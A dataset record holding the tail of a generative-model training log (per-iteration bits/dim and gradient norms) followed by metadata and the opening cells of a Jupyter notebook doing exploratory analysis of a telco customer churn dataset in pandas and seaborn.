0.1317(0.1050) | Total Time 10.00(10.00)\nIter 5867 | Time 39.3519(40.6262) | Bit/dim 1.0731(1.0738) | Xent 0.0000(0.0000) | Loss 1.0731(1.0738) | Error 0.0000(0.0000) Steps 446(449.71) | Grad Norm 0.0925(0.1046) | Total Time 10.00(10.00)\nIter 5868 | Time 41.4110(40.6498) | Bit/dim 1.0733(1.0738) | Xent 0.0000(0.0000) | Loss 1.0733(1.0738) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.1058(0.1046) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0556 | Time 15.1724, Epoch Time 311.3127(311.9409), Bit/dim 1.0688(best: 1.0684), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5869 | Time 41.2251(40.6670) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.67) | Grad Norm 0.0706(0.1036) | Total Time 10.00(10.00)\nIter 5870 | Time 39.1357(40.6211) | Bit/dim 1.0738(1.0738) | Xent 0.0000(0.0000) | Loss 1.0738(1.0738) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0881(0.1031) | Total Time 10.00(10.00)\nIter 5871 | Time 40.5704(40.6196) | Bit/dim 1.0725(1.0738) | Xent 0.0000(0.0000) | Loss 1.0725(1.0738) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0663(0.1020) | Total Time 10.00(10.00)\nIter 5872 | Time 40.2911(40.6097) | Bit/dim 1.0772(1.0739) | Xent 0.0000(0.0000) | Loss 1.0772(1.0739) | Error 0.0000(0.0000) Steps 452(449.70) | Grad Norm 0.0700(0.1011) | Total Time 10.00(10.00)\nIter 5873 | Time 41.0315(40.6224) | Bit/dim 1.0783(1.0740) | Xent 0.0000(0.0000) | Loss 1.0783(1.0740) | Error 0.0000(0.0000) Steps 452(449.77) | Grad Norm 0.1033(0.1011) | Total Time 10.00(10.00)\nIter 5874 | Time 41.6335(40.6527) | Bit/dim 1.0670(1.0738) | Xent 0.0000(0.0000) | Loss 1.0670(1.0738) | Error 0.0000(0.0000) Steps 446(449.66) | Grad Norm 0.0985(0.1011) | Total Time 10.00(10.00)\nIter 5875 | Time 40.6004(40.6511) | Bit/dim 1.0737(1.0738) | Xent 0.0000(0.0000) | Loss 1.0737(1.0738) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.0523(0.0996) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0557 | Time 15.2105, Epoch Time 312.2674(311.9507), Bit/dim 1.0685(best: 1.0684), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5876 | Time 39.6614(40.6214) | Bit/dim 1.0688(1.0736) | Xent 0.0000(0.0000) | Loss 1.0688(1.0736) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.0810(0.0990) | Total Time 10.00(10.00)\nIter 5877 | Time 39.4023(40.5849) | Bit/dim 1.0771(1.0737) | Xent 0.0000(0.0000) | Loss 1.0771(1.0737) | Error 0.0000(0.0000) Steps 446(449.68) | Grad Norm 0.1107(0.0994) | Total Time 10.00(10.00)\nIter 5878 | Time 40.3916(40.5791) | Bit/dim 1.0707(1.0736) | Xent 0.0000(0.0000) | Loss 1.0707(1.0736) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0585(0.0982) | Total Time 10.00(10.00)\nIter 5879 | Time 39.7432(40.5540) | Bit/dim 1.0750(1.0737) | Xent 0.0000(0.0000) | Loss 1.0750(1.0737) | Error 0.0000(0.0000) Steps 446(449.64) | Grad Norm 0.0996(0.0982) | Total Time 10.00(10.00)\nIter 5880 | Time 39.9087(40.5346) | Bit/dim 1.0736(1.0737) | Xent 0.0000(0.0000) | Loss 1.0736(1.0737) | Error 0.0000(0.0000) Steps 452(449.71) | Grad Norm 0.0832(0.0978) | Total Time 10.00(10.00)\nIter 5881 | Time 40.4565(40.5323) | Bit/dim 1.0724(1.0736) | Xent 0.0000(0.0000) | Loss 1.0724(1.0736) | Error 0.0000(0.0000) Steps 446(449.60) | Grad Norm 0.1186(0.0984) | Total Time 10.00(10.00)\nIter 5882 | Time 39.9912(40.5161) | Bit/dim 1.0782(1.0738) | Xent 0.0000(0.0000) | Loss 1.0782(1.0738) | Error 0.0000(0.0000) Steps 446(449.49) | Grad Norm 0.0885(0.0981) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0558 | Time 15.2361, Epoch Time 307.4211(311.8148), Bit/dim 1.0682(best: 1.0684), Xent 0.0000, Loss 1.0682, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5883 | Time 42.4502(40.5741) | Bit/dim 1.0753(1.0738) | Xent 0.0000(0.0000) | Loss 1.0753(1.0738) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.1431(0.0994) | Total Time 10.00(10.00)\nIter 5884 | Time 42.2774(40.6252) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.46) | Grad Norm 0.0906(0.0992) | Total Time 10.00(10.00)\nIter 5885 | Time 38.9984(40.5764) | Bit/dim 1.0746(1.0738) | Xent 0.0000(0.0000) | Loss 1.0746(1.0738) | Error 0.0000(0.0000) Steps 452(449.53) | Grad Norm 0.0543(0.0978) | Total Time 10.00(10.00)\nIter 5886 | Time 41.9293(40.6170) | Bit/dim 1.0756(1.0739) | Xent 0.0000(0.0000) | Loss 1.0756(1.0739) | Error 0.0000(0.0000) Steps 446(449.43) | Grad Norm 0.0985(0.0978) | Total Time 10.00(10.00)\nIter 5887 | Time 40.3872(40.6101) | Bit/dim 1.0723(1.0738) | Xent 0.0000(0.0000) | Loss 1.0723(1.0738) | Error 0.0000(0.0000) Steps 452(449.51) | Grad Norm 0.1114(0.0982) | Total Time 10.00(10.00)\nIter 5888 | Time 40.9802(40.6212) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 452(449.58) | Grad Norm 0.0584(0.0971) | Total Time 10.00(10.00)\nIter 5889 | Time 40.6562(40.6222) | Bit/dim 1.0715(1.0737) | Xent 0.0000(0.0000) | Loss 1.0715(1.0737) | Error 0.0000(0.0000) Steps 446(449.47) | Grad Norm 0.1452(0.0985) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0559 | Time 15.1436, Epoch Time 315.4256(311.9231), Bit/dim 1.0689(best: 1.0682), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5890 | Time 41.5341(40.6496) | Bit/dim 1.0761(1.0738) | Xent 0.0000(0.0000) | Loss 1.0761(1.0738) | Error 0.0000(0.0000) Steps 452(449.55) | Grad Norm 0.0864(0.0981) | Total Time 10.00(10.00)\nIter 5891 | Time 40.7620(40.6529) | Bit/dim 1.0740(1.0738) | Xent 0.0000(0.0000) | Loss 1.0740(1.0738) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0810(0.0976) | Total Time 10.00(10.00)\nIter 5892 | Time 41.8370(40.6885) | Bit/dim 1.0696(1.0737) | Xent 0.0000(0.0000) | Loss 1.0696(1.0737) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.1264(0.0985) | Total Time 10.00(10.00)\nIter 5893 | Time 41.4235(40.7105) | Bit/dim 1.0722(1.0736) | Xent 0.0000(0.0000) | Loss 1.0722(1.0736) | Error 0.0000(0.0000) Steps 452(449.59) | Grad Norm 0.1058(0.0987) | Total Time 10.00(10.00)\nIter 5894 | Time 41.2708(40.7273) | Bit/dim 1.0740(1.0736) | Xent 0.0000(0.0000) | Loss 1.0740(1.0736) | Error 0.0000(0.0000) Steps 452(449.66) | Grad Norm 0.0866(0.0983) | Total Time 10.00(10.00)\nIter 5895 | Time 39.5381(40.6917) | Bit/dim 1.0718(1.0736) | Xent 0.0000(0.0000) | Loss 1.0718(1.0736) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.1232(0.0991) | Total Time 10.00(10.00)\nIter 5896 | Time 41.7116(40.7222) | Bit/dim 1.0757(1.0736) | Xent 0.0000(0.0000) | Loss 1.0757(1.0736) | Error 0.0000(0.0000) Steps 446(449.62) | Grad Norm 0.0845(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0560 | Time 15.1990, Epoch Time 315.4880(312.0301), Bit/dim 1.0682(best: 1.0682), Xent 0.0000, Loss 1.0682, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5897 | Time 39.4517(40.6841) | Bit/dim 1.0735(1.0736) | Xent 0.0000(0.0000) | Loss 1.0735(1.0736) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0624(0.0976) | Total Time 10.00(10.00)\nIter 5898 | Time 40.2278(40.6704) | Bit/dim 1.0686(1.0735) | Xent 0.0000(0.0000) | Loss 1.0686(1.0735) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.0915(0.0974) | Total Time 10.00(10.00)\nIter 5899 | Time 40.8311(40.6753) | Bit/dim 1.0770(1.0736) | Xent 0.0000(0.0000) | Loss 1.0770(1.0736) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.0738(0.0967) | Total Time 10.00(10.00)\nIter 5900 | Time 40.4432(40.6683) | Bit/dim 1.0731(1.0736) | Xent 0.0000(0.0000) | Loss 1.0731(1.0736) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0889(0.0964) | Total Time 10.00(10.00)\nIter 5901 | Time 40.2955(40.6571) | Bit/dim 1.0778(1.0737) | Xent 0.0000(0.0000) | Loss 1.0778(1.0737) | Error 0.0000(0.0000) Steps 446(449.45) | Grad Norm 0.0949(0.0964) | Total Time 10.00(10.00)\nIter 5902 | Time 39.4594(40.6212) | Bit/dim 1.0722(1.0737) | Xent 0.0000(0.0000) | Loss 1.0722(1.0737) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.0975(0.0964) | Total Time 10.00(10.00)\nIter 5903 | Time 39.4167(40.5851) | Bit/dim 1.0763(1.0737) | Xent 0.0000(0.0000) | Loss 1.0763(1.0737) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.1639(0.0984) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0561 | Time 14.9828, Epoch Time 307.5856(311.8967), Bit/dim 1.0687(best: 1.0682), Xent 0.0000, Loss 1.0687, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5904 | Time 40.7214(40.5891) | Bit/dim 1.0786(1.0739) | Xent 0.0000(0.0000) | Loss 1.0786(1.0739) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0783(0.0978) | Total Time 10.00(10.00)\nIter 5905 | Time 42.3505(40.6420) | Bit/dim 1.0735(1.0739) | Xent 0.0000(0.0000) | Loss 1.0735(1.0739) | Error 0.0000(0.0000) Steps 458(449.59) | Grad Norm 0.1585(0.0997) | Total Time 10.00(10.00)\nIter 5906 | Time 41.4638(40.6666) | Bit/dim 1.0727(1.0738) | Xent 0.0000(0.0000) | Loss 1.0727(1.0738) | Error 0.0000(0.0000) Steps 446(449.48) | Grad Norm 0.1039(0.0998) | Total Time 10.00(10.00)\nIter 5907 | Time 41.5614(40.6935) | Bit/dim 1.0734(1.0738) | Xent 0.0000(0.0000) | Loss 1.0734(1.0738) | Error 0.0000(0.0000) Steps 446(449.38) | Grad Norm 0.0620(0.0987) | Total Time 10.00(10.00)\nIter 5908 | Time 40.8549(40.6983) | Bit/dim 1.0743(1.0738) | Xent 0.0000(0.0000) | Loss 1.0743(1.0738) | Error 0.0000(0.0000) Steps 452(449.46) | Grad Norm 0.0933(0.0985) | Total Time 10.00(10.00)\nIter 5909 | Time 40.4625(40.6912) | Bit/dim 1.0715(1.0738) | Xent 0.0000(0.0000) | Loss 1.0715(1.0738) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.1315(0.0995) | Total Time 10.00(10.00)\nIter 5910 | Time 41.7588(40.7233) | Bit/dim 1.0732(1.0737) | Xent 0.0000(0.0000) | Loss 1.0732(1.0737) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.0736(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0562 | Time 15.1465, Epoch Time 316.5936(312.0376), Bit/dim 1.0686(best: 1.0682), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5911 | Time 39.7946(40.6954) | Bit/dim 1.0768(1.0738) | Xent 0.0000(0.0000) | Loss 1.0768(1.0738) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.0704(0.0979) | Total Time 10.00(10.00)\nIter 5912 | Time 42.2856(40.7431) | Bit/dim 1.0700(1.0737) | Xent 0.0000(0.0000) | Loss 1.0700(1.0737) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0857(0.0975) | Total Time 10.00(10.00)\nIter 5913 | Time 40.9905(40.7505) | Bit/dim 1.0729(1.0737) | Xent 0.0000(0.0000) | Loss 1.0729(1.0737) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0766(0.0969) | Total Time 10.00(10.00)\nIter 5914 | Time 41.9287(40.7859) | Bit/dim 1.0752(1.0737) | Xent 0.0000(0.0000) | Loss 1.0752(1.0737) | Error 0.0000(0.0000) Steps 446(449.22) | Grad Norm 0.0992(0.0969) | Total Time 10.00(10.00)\nIter 5915 | Time 40.1774(40.7676) | Bit/dim 1.0723(1.0737) | Xent 0.0000(0.0000) | Loss 1.0723(1.0737) | Error 0.0000(0.0000) Steps 446(449.13) | Grad Norm 0.0593(0.0958) | Total Time 10.00(10.00)\nIter 5916 | Time 41.6670(40.7946) | Bit/dim 1.0749(1.0737) | Xent 0.0000(0.0000) | Loss 1.0749(1.0737) | Error 0.0000(0.0000) Steps 452(449.21) | Grad Norm 0.0691(0.0950) | Total Time 10.00(10.00)\nIter 5917 | Time 41.3025(40.8098) | Bit/dim 1.0728(1.0737) | Xent 0.0000(0.0000) | Loss 1.0728(1.0737) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.0725(0.0943) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0563 | Time 15.1350, Epoch Time 315.6752(312.1468), Bit/dim 1.0680(best: 1.0682), Xent 0.0000, Loss 1.0680, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5918 | Time 41.0342(40.8166) | Bit/dim 1.0712(1.0736) | Xent 0.0000(0.0000) | Loss 1.0712(1.0736) | Error 0.0000(0.0000) Steps 446(449.20) | Grad Norm 0.0882(0.0941) | Total Time 10.00(10.00)\nIter 5919 | Time 38.8303(40.7570) | Bit/dim 1.0745(1.0737) | Xent 0.0000(0.0000) | Loss 1.0745(1.0737) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.0721(0.0935) | Total Time 10.00(10.00)\nIter 5920 | Time 40.7634(40.7572) | Bit/dim 1.0762(1.0737) | Xent 0.0000(0.0000) | Loss 1.0762(1.0737) | Error 0.0000(0.0000) Steps 452(449.36) | Grad Norm 0.0628(0.0926) | Total Time 10.00(10.00)\nIter 5921 | Time 41.4122(40.7768) | Bit/dim 1.0742(1.0738) | Xent 0.0000(0.0000) | Loss 1.0742(1.0738) | Error 0.0000(0.0000) Steps 446(449.26) | Grad Norm 0.0683(0.0918) | Total Time 10.00(10.00)\nIter 5922 | Time 42.0929(40.8163) | Bit/dim 1.0765(1.0738) | Xent 0.0000(0.0000) | Loss 1.0765(1.0738) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0689(0.0911) | Total Time 10.00(10.00)\nIter 5923 | Time 40.7724(40.8150) | Bit/dim 1.0710(1.0737) | Xent 0.0000(0.0000) | Loss 1.0710(1.0737) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.1045(0.0915) | Total Time 10.00(10.00)\nIter 5924 | Time 40.5425(40.8068) | Bit/dim 1.0695(1.0736) | Xent 0.0000(0.0000) | Loss 1.0695(1.0736) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0553(0.0905) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0564 | Time 15.3287, Epoch Time 313.4728(312.1866), Bit/dim 1.0685(best: 1.0680), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5925 | Time 42.0276(40.8434) | Bit/dim 1.0728(1.0736) | Xent 0.0000(0.0000) | Loss 1.0728(1.0736) | Error 0.0000(0.0000) Steps 452(449.41) | Grad Norm 0.0692(0.0898) | Total Time 10.00(10.00)\nIter 5926 | Time 39.8936(40.8149) | Bit/dim 1.0743(1.0736) | Xent 0.0000(0.0000) | Loss 1.0743(1.0736) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0606(0.0889) | Total Time 10.00(10.00)\nIter 5927 | Time 39.7957(40.7844) | Bit/dim 1.0693(1.0735) | Xent 0.0000(0.0000) | Loss 1.0693(1.0735) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0612(0.0881) | Total Time 10.00(10.00)\nIter 5928 | Time 39.6817(40.7513) | Bit/dim 1.0712(1.0734) | Xent 0.0000(0.0000) | Loss 1.0712(1.0734) | Error 0.0000(0.0000) Steps 446(449.29) | Grad Norm 0.0740(0.0877) | Total Time 10.00(10.00)\nIter 5929 | Time 40.4155(40.7412) | Bit/dim 1.0749(1.0735) | Xent 0.0000(0.0000) | Loss 1.0749(1.0735) | Error 0.0000(0.0000) Steps 452(449.37) | Grad Norm 0.0705(0.0872) | Total Time 10.00(10.00)\nIter 5930 | Time 40.2516(40.7265) | Bit/dim 1.0727(1.0734) | Xent 0.0000(0.0000) | Loss 1.0727(1.0734) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.1182(0.0881) | Total Time 10.00(10.00)\nIter 5931 | Time 40.6775(40.7251) | Bit/dim 1.0750(1.0735) | Xent 0.0000(0.0000) | Loss 1.0750(1.0735) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.0648(0.0874) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0565 | Time 15.1303, Epoch Time 310.5796(312.1383), Bit/dim 1.0686(best: 1.0680), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5932 | Time 40.4630(40.7172) | Bit/dim 1.0808(1.0737) | Xent 0.0000(0.0000) | Loss 1.0808(1.0737) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.0686(0.0868) | Total Time 10.00(10.00)\nIter 5933 | Time 40.3167(40.7052) | Bit/dim 1.0705(1.0736) | Xent 0.0000(0.0000) | Loss 1.0705(1.0736) | Error 0.0000(0.0000) Steps 446(449.33) | Grad Norm 0.1137(0.0876) | Total Time 10.00(10.00)\nIter 5934 | Time 41.6319(40.7330) | Bit/dim 1.0710(1.0735) | Xent 0.0000(0.0000) | Loss 1.0710(1.0735) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0989(0.0880) | Total Time 10.00(10.00)\nIter 5935 | Time 39.1746(40.6862) | Bit/dim 1.0778(1.0737) | Xent 0.0000(0.0000) | Loss 1.0778(1.0737) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0793(0.0877) | Total Time 10.00(10.00)\nIter 5936 | Time 39.1640(40.6406) | Bit/dim 1.0708(1.0736) | Xent 0.0000(0.0000) | Loss 1.0708(1.0736) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.1125(0.0885) | Total Time 10.00(10.00)\nIter 5937 | Time 39.5697(40.6084) | Bit/dim 1.0697(1.0735) | Xent 0.0000(0.0000) | Loss 1.0697(1.0735) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.1297(0.0897) | Total Time 10.00(10.00)\nIter 5938 | Time 41.2909(40.6289) | Bit/dim 1.0724(1.0734) | Xent 0.0000(0.0000) | Loss 1.0724(1.0734) | Error 0.0000(0.0000) Steps 452(449.38) | Grad Norm 0.0648(0.0890) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0566 | Time 14.9903, Epoch Time 309.1509(312.0487), Bit/dim 1.0692(best: 1.0680), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5939 | Time 40.5493(40.6265) | Bit/dim 1.0736(1.0734) | Xent 0.0000(0.0000) | Loss 1.0736(1.0734) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.0975(0.0892) | Total Time 10.00(10.00)\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
e70724a0e28e2899d193468484c86cc506c5172e | 947,800 | ipynb | Jupyter Notebook | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | 2 | 2020-09-27T09:52:32.000Z | 2021-05-11T22:57:08.000Z | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | null | null | null | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | null | null | null | 291.36182 | 360,376 | 0.902236 | [
[
[
"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# suppress warning\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# set diverging color palette\n# https://chrisalbon.com/python/data_visualization/seaborn_color_palettes/\ncolor = sns.color_palette('CMRmap')\nsns.palplot(color)\nsns.set()",
"_____no_output_____"
]
],
[
[
"**Problem Statement**\n\nImprove sales revenue of the telco by predicting(classifiying) customer Churn/No Churn using the provided features.\nAccuracy must be the same or better than baseline but we 'gotta-catch'em all' the Churn customers. ",
"_____no_output_____"
]
],
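[
[
"# Editor's illustration (not part of the original notebook): the problem statement\n# above translates into tracking accuracy AND recall on the Churn class.\n# The labels and predictions here are toy values, not real model output.\nfrom sklearn.metrics import accuracy_score, recall_score\n\ny_true = [1, 0, 0, 1, 0, 1]  # 1 = Churn, 0 = No Churn (toy labels)\ny_pred = [1, 0, 0, 0, 0, 1]  # hypothetical model predictions\nprint('accuracy:', accuracy_score(y_true, y_pred))  # must match/beat the ~0.73 baseline\nprint('churn recall:', recall_score(y_true, y_pred))  # fraction of churners we catch",
"_____no_output_____"
]
],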
[
[
"# read csv and display 5 rows\ndf = pd.read_csv('data/churn.csv')\ndf.head()\n\n# drop 'customerID' as it's a serialize number\ndf.drop(columns = 'customerID',inplace=True)",
"_____no_output_____"
],
[
"# Churn is our target variables, the rest are predictor variables\ndf.columns",
"_____no_output_____"
],
[
"# Convert to numeric\ndf['TotalCharges'] = pd.to_numeric(df['TotalCharges'],errors=\"coerce\")\ndf.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"#display all rows that are null\ndf[df.isna().any(axis=1)]",
"_____no_output_____"
],
[
"# We will drop the 11 values since it's only 0.15% of the DF\n# and we are not able to determine the Total Charges\n# and the target variable is 'No Churn'\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"# verify there is no null\ndf.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"# backup processed df\ndf.to_csv('data/churn_done.csv',index=False)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"g= sns.catplot(x=\"Churn\", kind=\"count\", data=df)\ng.fig.suptitle('Valuecount of Churn and No Churn');",
"_____no_output_____"
],
[
"# 27% of the customers churn\n# there is a chance that we may need to consider this an imbalanced dataset\n# The baseline accuracy is 73%\ndf.Churn.value_counts(normalize=True).round(2)",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 7032 entries, 0 to 7042\nData columns (total 20 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 gender 7032 non-null object \n 1 SeniorCitizen 7032 non-null int64 \n 2 Partner 7032 non-null object \n 3 Dependents 7032 non-null object \n 4 tenure 7032 non-null int64 \n 5 PhoneService 7032 non-null object \n 6 MultipleLines 7032 non-null object \n 7 InternetService 7032 non-null object \n 8 OnlineSecurity 7032 non-null object \n 9 OnlineBackup 7032 non-null object \n 10 DeviceProtection 7032 non-null object \n 11 TechSupport 7032 non-null object \n 12 StreamingTV 7032 non-null object \n 13 StreamingMovies 7032 non-null object \n 14 Contract 7032 non-null object \n 15 PaperlessBilling 7032 non-null object \n 16 PaymentMethod 7032 non-null object \n 17 MonthlyCharges 7032 non-null float64\n 18 TotalCharges 7032 non-null float64\n 19 Churn 7032 non-null object \ndtypes: float64(2), int64(2), object(16)\nmemory usage: 1.4+ MB\n"
],
[
"# 7032 rows with 19 features ( less target variable)\ndf.shape",
"_____no_output_____"
],
[
"# display all the unique values\nprint('col name \\t dtype \\t Unique Values')\nprint('=======================================')\nfor col in df.columns:\n print(f'{col} \\t | { df[col].dtype} -> { df[col].unique()} \\n')",
"col name \t dtype \t Unique Values\n=======================================\ngender \t | object -> ['Female' 'Male'] \n\nSeniorCitizen \t | int64 -> [0 1] \n\nPartner \t | object -> ['Yes' 'No'] \n\nDependents \t | object -> ['No' 'Yes'] \n\ntenure \t | int64 -> [ 1 34 2 45 8 22 10 28 62 13 16 58 49 25 69 52 71 21 12 30 47 72 17 27\n 5 46 11 70 63 43 15 60 18 66 9 3 31 50 64 56 7 42 35 48 29 65 38 68\n 32 55 37 36 41 6 4 33 67 23 57 61 14 20 53 40 59 24 44 19 54 51 26 39] \n\nPhoneService \t | object -> ['No' 'Yes'] \n\nMultipleLines \t | object -> ['No phone service' 'No' 'Yes'] \n\nInternetService \t | object -> ['DSL' 'Fiber optic' 'No'] \n\nOnlineSecurity \t | object -> ['No' 'Yes' 'No internet service'] \n\nOnlineBackup \t | object -> ['Yes' 'No' 'No internet service'] \n\nDeviceProtection \t | object -> ['No' 'Yes' 'No internet service'] \n\nTechSupport \t | object -> ['No' 'Yes' 'No internet service'] \n\nStreamingTV \t | object -> ['No' 'Yes' 'No internet service'] \n\nStreamingMovies \t | object -> ['No' 'Yes' 'No internet service'] \n\nContract \t | object -> ['Month-to-month' 'One year' 'Two year'] \n\nPaperlessBilling \t | object -> ['Yes' 'No'] \n\nPaymentMethod \t | object -> ['Electronic check' 'Mailed check' 'Bank transfer (automatic)'\n 'Credit card (automatic)'] \n\nMonthlyCharges \t | float64 -> [29.85 56.95 53.85 ... 63.1 44.2 78.7 ] \n\nTotalCharges \t | float64 -> [ 29.85 1889.5 108.15 ... 346.45 306.6 6844.5 ] \n\nChurn \t | object -> ['No' 'Yes'] \n\n"
]
],
[
[
"| # | Column | Old D-type | New D-type | Change ? |\n|----|------------------|------------|------------|----------|\n| 0 | gender | object | int64 | No |\n| 1 | SeniorCitizen | int64 | int64 | No |\n| 2 | Partner | object | int64 | Yes |\n| 3 | Dependents | object | int64 | Yes |\n| 4 | tenure | int64 | int64 | No |\n| 5 | PhoneService | object | int64 | Yes |\n| 6 | MultipleLines | object | object | No |\n| 7 | InternetService | object | object | No |\n| 8 | OnlineSecurity | object | object | No |\n| 9 | OnlineBackup | object | object | No |\n| 10 | DeviceProtection | object | object | No |\n| 11 | TechSupport | object | object | No |\n| 12 | StreamingTV | object | object | No |\n| 13 | StreamingMovies | object | object | No |\n| 14 | Contract | object | object | No |\n| 15 | PaperlessBilling | object | int64 | Yes |\n| 16 | PaymentMethod | object | object | No |\n| 17 | MonthlyCharges | float64 | float64 | No |\n| 18 | TotalCharges | object | float64 | Yes |\n| 19 | Churn | object | int64 | Yes |",
"_____no_output_____"
],
[
"There are 3 types of data:\n* Numerical - continuous values - 10.1cm , 5.2 seconds etc \n* Categorical ( Nominal - there is no order i.e blue, green , orange)\n* Categorical ( Ordinal - there is order i.e small, medium , large ) ",
"_____no_output_____"
]
],
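[
[
"# Editor's sketch (not in the original notebook): nominal columns with more than two\n# categories are usually one-hot encoded so that no artificial order is implied.\nnominal_example = pd.get_dummies(df[['InternetService', 'Contract', 'PaymentMethod']])\nnominal_example.head()",
"_____no_output_____"
]
],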
[
[
"binary_columns = ['Partner','Dependents','PhoneService','PaperlessBilling','Churn']",
"_____no_output_____"
],
[
"from sklearn.preprocessing import LabelEncoder\n\nlabel = LabelEncoder()\n#label.fit(df['Partner'])\n\ndef convert_to_binary(binary_columns):\n '''convert a list of columns to binary'''\n for col in binary_columns:\n #df[col]= label.transform(df[col])\n df[col]= label.fit_transform(df[col])\n \nconvert_to_binary(binary_columns)",
"_____no_output_____"
],
[
"# ['Partner','Dependents','PhoneService','PaperlessBilling','Churn'] already binarized\ndf.info()",
